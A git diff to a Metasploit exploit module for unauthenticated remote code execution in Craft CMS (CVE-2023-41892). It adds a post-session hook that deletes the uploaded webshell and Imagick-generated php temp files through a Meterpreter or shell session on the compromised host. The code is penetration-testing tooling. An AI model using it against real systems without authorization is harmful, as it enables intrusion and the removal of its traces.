diff --git a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb index 588419578906..41ac6f9e1840 100644 --- a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb +++ b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb @@ -237,6 +237,32 @@ def execute_command(cmd, _opts = {}) }) end + def on_new_session(session) + # cleanup webshell in DOCUMENT_ROOT + register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}") + + # Imagick plugin generates a php file with MSL code in the directory set by + # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell. + # A manual cleanup procedure is required to identify and remove the php* files when the session is established. + if session.type == 'meterpreter' + session.fs.dir.chdir(@config['upload_tmp_dir'].to_s) + clean_files = session.fs.dir.entries + unless clean_files.nil? || clean_files.empty? + clean_files.each do |f| + register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/php+/) + end + end + else + clean_files = session.shell_command_token("ls #{@config['upload_tmp_dir']}/php*") + unless clean_files.nil? || clean_files.empty? + clean_files.split(' ').each do |f| + register_files_for_cleanup(f.to_s) + end + end + end + super + end + def check check_phpinfo return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil? @@ -249,7 +275,6 @@ def exploit check_phpinfo unless datastore['AutoCheck'] fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil? fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell - register_files_for_cleanup(@webshell_name.to_s) print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type']